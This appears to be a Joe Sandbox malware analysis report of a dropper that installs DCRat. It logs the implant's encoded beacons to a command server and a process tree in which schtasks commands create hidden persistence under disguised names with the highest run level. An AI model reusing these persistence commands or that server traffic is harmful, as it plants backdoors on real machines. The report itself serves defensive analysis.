Dec 29, 2024 00:08:48.625761032 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 28 Dec 2024 23:08:48 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 59 78 51 54 59 6a 68 44 4f 35 6b 6a 4e 68 56 54 59 31 49 7a 4e 69 64 54 4e 30 55 32 4e 30 55 44 4f 34 49 6d 5a 35 67 44 4e 33 49 79 65 36 49 43 4d 35 45 6d 5a 6c 56 54 59 33 67 44 4f 33 51 47 5a 69 46 57 4e 6a 46 47 4d 68 6c 54 59 35 59 7a 59 6d 5a 6d 4d 7a 4d 6d 4e 32 49 79 65 Data Ascii: ==Qf9JiI6ISYxQTYjhDO5kjNhVTY1IzNidTN0U2N0UDO4ImZ5gDN3Iye6ICM5EmZlVTY3gDO3QGZiFWNjFGMhlTY5YzYmZmMzMmN2Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49876	185.114.245.123	80	6660	C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe

Timestamp	Bytes transferred	Direction	Data
Dec 29, 2024 00:08:53.762722015 CET	2105	OUT	GET /4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMlN2M0czN0ETOyITNyITMhlzYlBDMhVTZ4YzNjJjZ4UGMzYTN2IDNxMTO5gTN3kjN&0f0872650c0ba62ba5efb31d4a3a3070=wNlNGMmVGM1QDMmJ2MihjZ5IGN4EmYlFDO1UGMidTN4EDZ0MmMhNDN&dad8ed6f5561ed0ffbb71c569304256f=d1nIwEmYmNmM1QjYxIjNkhzNyEWYhJDZhN2YhZWOhVjN2QGN0UDZwQWZ1IiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W&1b4307a464f9201736c9c444186ee18b=d1nIiojIxUmYzAzN5MTMxYWZxMjNiFWNzEGN4MDMlNDMwQmN3EmIsICMhJmZjJTN0IWMyYDZ4cjMhFWYyQWYjNWYmlTY1YjNkRDN1QGMkVWNiojI0QmNyMzY4YTNmRWY3UzNmNGZmhzYzAjZ2kjY4YzYwgjIsIyM2EDMzQWN0ImZmNjN3gjNxQWZ1U2M1UGZ2ETNyATYkNzNkNTOiV2MiojI0QmYjRWOxAjMyAjM2QGOzQmNwEmZlNzYwQGO2YDZkZmI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxE [TRUNCATED] Accept: / Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: ce58027.tw1.ru
Dec 29, 2024 00:08:55.098342896 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 28 Dec 2024 23:08:54 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 59 78 51 54 59 6a 68 44 4f 35 6b 6a 4e 68 56 54 59 31 49 7a 4e 69 64 54 4e 30 55 32 4e 30 55 44 4f 34 49 6d 5a 35 67 44 4e 33 49 79 65 36 49 43 4d 35 45 6d 5a 6c 56 54 59 33 67 44 4f 33 51 47 5a 69 46 57 4e 6a 46 47 4d 68 6c 54 59 35 59 7a 59 6d 5a 6d 4d 7a 4d 6d 4e 32 49 79 65 Data Ascii: ==Qf9JiI6ISYxQTYjhDO5kjNhVTY1IzNidTN0U2N0UDO4ImZ5gDN3Iye6ICM5EmZlVTY3gDO3QGZiFWNjFGMhlTY5YzYmZmMzMmN2Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49892	185.114.245.123	80	6660	C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe

Timestamp	Bytes transferred	Direction	Data
Dec 29, 2024 00:09:00.274534941 CET	2103	OUT	GET /4fe1d043.php?D73HWBI=c1IMhB1J7yGQNa&3ca0d83b89e117a6a6aae39d35ce421c=1MzM4UjMlN2M0czN0ETOyITNyITMhlzYlBDMhVTZ4YzNjJjZ4UGMzYTN2IDNxMTO5gTN3kjN&0f0872650c0ba62ba5efb31d4a3a3070=wNlNGMmVGM1QDMmJ2MihjZ5IGN4EmYlFDO1UGMidTN4EDZ0MmMhNDN&dad8ed6f5561ed0ffbb71c569304256f=d1nIwEmYmNmM1QjYxIjNkhzNyEWYhJDZhN2YhZWOhVjN2QGN0UDZwQWZ1IiOiQDZ2IzMjhjN1YGZhdTN3Y2YkZGOjNDMmZTOihjNjBDOiwiIzYTMwMDZ1QjYmZ2M2cDO2EDZlVTZzUTZkZTM1IDMhR2M3Q2M5IWZzIiOiQDZiNGZ5EDMyIDMyYDZ4MDZ2ATYmV2MjBDZ4YjNkRmZis3W&1b4307a464f9201736c9c444186ee18b=QX9JiI6ISMlJ2MwcTOzETMmVWMzYjYhVzMhRDOzATZzADMkZzNhJCLiATYiZ2YyUDNiFjM2QGO3ITYhFmMkF2YjFmZ5EWN2YDZ0QTNkBDZlVjI6ICNkZjMzMGO2UjZkF2N1cjZjRmZ4M2MwYmN5IGO2MGM4ICLiMjNxAzMkVDNiZmZzYzN4YTMkVWNlNTNlRmNxUjMwEGZzcDZzkjYlNjI6ICNkJ2YklTMwIjMwIjNkhzMkZDMhZWZzMGMkhjN2QGZmJyes0nI5YlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpNWbiBnQYpFb4JTVp9maJpnVIRGaSNTV1IFWhJDbHRmaGtWSzlUaJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjM [TRUNCATED] Accept: / Content-Type: text/javascript User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: ce58027.tw1.ru Connection: Keep-Alive
Dec 29, 2024 00:09:01.789987087 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 28 Dec 2024 23:09:01 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 53 59 78 51 54 59 6a 68 44 4f 35 6b 6a 4e 68 56 54 59 31 49 7a 4e 69 64 54 4e 30 55 32 4e 30 55 44 4f 34 49 6d 5a 35 67 44 4e 33 49 79 65 36 49 43 4d 35 45 6d 5a 6c 56 54 59 33 67 44 4f 33 51 47 5a 69 46 57 4e 6a 46 47 4d 68 6c 54 59 35 59 7a 59 6d 5a 6d 4d 7a 4d 6d 4e 32 49 79 65 Data Ascii: ==Qf9JiI6ISYxQTYjhDO5kjNhVTY1IzNidTN0U2N0UDO4ImZ5gDN3Iye6ICM5EmZlVTY3gDO3QGZiFWNjFGMhlTY5YzYmZmMzMmN2Iye

Target ID:	0
Start time:	18:06:56
Start date:	28/12/2024
Path:	C:\Users\user\Desktop\hK8z1AmKO1.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\hK8z1AmKO1.exe"
Imagebase:	0xb70000
File size:	1'624'759 bytes
MD5 hash:	69479795019AA359D016E695415F1736
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	18:06:57
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\PortsavesPerfdhcpsvc\jTMUiy4UT3fzJ0p29vviWqbG.vbe"
Imagebase:	0x50000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	18:06:59
Start date:	28/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\PortsavesPerfdhcpsvc\oSG0DtwH58jESdPiWbQWqH7Kb5.bat" "
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	18:06:59
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	18:06:59
Start date:	28/12/2024
Path:	C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe
Wow64 process (32bit):	false
Commandline:	"C:\PortsavesPerfdhcpsvc\providerwebmonitor.exe"
Imagebase:	0x190000
File size:	1'307'648 bytes
MD5 hash:	887AFE3CFC62D5BBF0F08374A9EA7CCE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1711103397.0000000002888000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1711103397.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000004.00000002.1711696699.00000000125AF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 78%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	18:07:00
Start date:	28/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 13 /tr "'C:\PortsavesPerfdhcpsvc\upfc.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	18:07:00
Start date:	28/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\PortsavesPerfdhcpsvc\upfc.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	18:07:01
Start date:	28/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 12 /tr "'C:\PortsavesPerfdhcpsvc\upfc.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	18:07:01
Start date:	28/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "UserOOBEBrokerU" /sc MINUTE /mo 10 /tr "'C:\PortsavesPerfdhcpsvc\UserOOBEBroker.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	18:07:01
Start date:	28/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "UserOOBEBroker" /sc ONLOGON /tr "'C:\PortsavesPerfdhcpsvc\UserOOBEBroker.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	18:07:01
Start date:	28/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "UserOOBEBrokerU" /sc MINUTE /mo 8 /tr "'C:\PortsavesPerfdhcpsvc\UserOOBEBroker.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	18:07:01
Start date:	28/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 6 /tr "'C:\Recovery\sihost.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	18:07:01
Start date:	28/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Recovery\sihost.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	18:07:01
Start date:	28/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 12 /tr "'C:\Recovery\sihost.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	18:07:01
Start date:	28/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "aVgRtcWKvuiHvUKTYwWvDjIqa" /sc MINUTE /mo 13 /tr "'C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe'" /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	18:07:01
Start date:	28/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "aVgRtcWKvuiHvUKTYwWvDjIq" /sc ONLOGON /tr "'C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	18:07:01
Start date:	28/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "aVgRtcWKvuiHvUKTYwWvDjIqa" /sc MINUTE /mo 12 /tr "'C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe'" /rl HIGHEST /f
Imagebase:	0x7ff76f990000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	18:07:01
Start date:	28/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\sSMyRm55ZX.bat"
Imagebase:	0x7ff6f8350000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	18:07:01
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	18:07:01
Start date:	28/12/2024
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff65d300000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	18:07:02
Start date:	28/12/2024
Path:	C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe
Wow64 process (32bit):	false
Commandline:	C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe
Imagebase:	0xd70000
File size:	1'307'648 bytes
MD5 hash:	887AFE3CFC62D5BBF0F08374A9EA7CCE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000014.00000002.2908319735.00000000035E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000014.00000002.2908319735.00000000033DD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000014.00000002.2908319735.00000000033A2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000014.00000002.2908319735.0000000003091000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000014.00000002.2908319735.00000000032E6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 78%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	21
Start time:	18:07:02
Start date:	28/12/2024
Path:	C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe
Wow64 process (32bit):	false
Commandline:	C:\Recovery\aVgRtcWKvuiHvUKTYwWvDjIq.exe
Imagebase:	0xa60000
File size:	1'307'648 bytes
MD5 hash:	887AFE3CFC62D5BBF0F08374A9EA7CCE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000015.00000002.1821575874.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	18:07:02
Start date:	28/12/2024
Path:	C:\Recovery\sihost.exe
Wow64 process (32bit):	false
Commandline:	C:\Recovery\sihost.exe
Imagebase:	0x3e0000
File size:	1'307'648 bytes
MD5 hash:	887AFE3CFC62D5BBF0F08374A9EA7CCE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000016.00000002.1814111144.0000000002641000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 78%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	18:07:02
Start date:	28/12/2024
Path:	C:\Recovery\sihost.exe
Wow64 process (32bit):	false
Commandline:	C:\Recovery\sihost.exe
Imagebase:	0x7e0000
File size:	1'307'648 bytes
MD5 hash:	887AFE3CFC62D5BBF0F08374A9EA7CCE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000017.00000002.1821403344.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	18:07:04
Start date:	28/12/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\57b77989-b658-46d2-a5dc-3af9328f5068.vbs"
Imagebase:	0x7ff7e1100000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	29
Start time:	18:07:05
Start date:	28/12/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ef498993-b965-4ad4-8c4b-72d20f78a4db.vbs"
Imagebase:	0x7ff7e1100000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	30
Start time:	18:07:07
Start date:	28/12/2024
Path:	C:\Recovery\sihost.exe
Wow64 process (32bit):	false
Commandline:	"C:\Recovery\sihost.exe"
Imagebase:	0xe20000
File size:	1'307'648 bytes
MD5 hash:	887AFE3CFC62D5BBF0F08374A9EA7CCE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001E.00000002.1843916510.0000000003201000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	9.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.2%
Total number of Nodes:	1509
Total number of Limit Nodes:	30

Executed Functions

Function 00B8D5D4 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 197
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B800CF: GetModuleHandleW.KERNEL32(kernel32), ref: 00B800E4
Part of subcall function 00B800CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00B800F6
Part of subcall function 00B800CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00B80127

Part of subcall function 00B89DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00B89DAC

Part of subcall function 00B8A335: OleInitialize.OLE32(00000000), ref: 00B8A34E
Part of subcall function 00B8A335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00B8A385
Part of subcall function 00B8A335: SHGetMalloc.SHELL32(00BB8430), ref: 00B8A38F

Part of subcall function 00B813B3: GetCPInfo.KERNEL32(00000000,?), ref: 00B813C4
Part of subcall function 00B813B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 00B813D8

GetCommandLineW.KERNEL32 ref: 00B8D61C
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00B8D643
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00B8D654
UnmapViewOfFile.KERNEL32(00000000), ref: 00B8D68E

Part of subcall function 00B8D287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00B8D29D
Part of subcall function 00B8D287: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00B8D2D9

CloseHandle.KERNEL32(00000000), ref: 00B8D697
GetModuleFileNameW.KERNEL32(00000000,00BCDC90,00000800), ref: 00B8D6B2
SetEnvironmentVariableW.KERNEL32(sfxname,00BCDC90), ref: 00B8D6BE
GetLocalTime.KERNEL32(?), ref: 00B8D6C9
_swprintf.LIBCMT ref: 00B8D708
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00B8D71A
GetModuleHandleW.KERNEL32(00000000), ref: 00B8D721
LoadIconW.USER32(00000000,00000064), ref: 00B8D738
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 00B8D789
Sleep.KERNEL32(?), ref: 00B8D7B7
DeleteObject.GDI32 ref: 00B8D7F0
DeleteObject.GDI32(?), ref: 00B8D800
CloseHandle.KERNEL32 ref: 00B8D843

Strings

STARTDLG, xrefs: 00B8D77E
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 00B8D6F9
winrarsfxmappingfile.tmp, xrefs: 00B8D637
sfxname, xrefs: 00B8D6B9
C:\Users\user\Desktop, xrefs: 00B8D5E9
sfxstime, xrefs: 00B8D715

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665841247.0000000000BA3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BAE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665869146.0000000000BD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1665931161.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_hK8z1AmKO1.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 788466649-3743209390
Opcode ID: f1894d69f474c5542a33125a4258fb05ae51d9f320e44ff9f3ccc321046837b2
Instruction ID: e4dbf3b114c03e2acca2541fecd40f5b9d6c97341a9117ba653028058df0ffc4
Opcode Fuzzy Hash: f1894d69f474c5542a33125a4258fb05ae51d9f320e44ff9f3ccc321046837b2
Instruction Fuzzy Hash: 3D616F71A04241AFD320BBA5EC4AF6B77ECEB49741F0405AAF549932B1EFB4D904C762

Function 00B89E1C Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32(00B8AE4D,PNG,?,?,?,00B8AE4D,00000066), ref: 00B89E2E
SizeofResource.KERNEL32(00000000,00000000,?,?,?,00B8AE4D,00000066), ref: 00B89E46
LoadResource.KERNEL32(00000000,?,?,?,00B8AE4D,00000066), ref: 00B89E59
LockResource.KERNEL32(00000000,?,?,?,00B8AE4D,00000066), ref: 00B89E64
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00B8AE4D,00000066), ref: 00B89E82
GlobalLock.KERNEL32(00000000), ref: 00B89E93
CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00B89EB7
GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00B89EFC
GlobalUnlock.KERNEL32(00000000), ref: 00B89F1B
GlobalFree.KERNEL32(00000000), ref: 00B89F22

Strings

PNG, xrefs: 00B89E1F

Memory Dump Source

Source File: 00000000.00000002.1665805418.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000000.00000002.1665776322.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
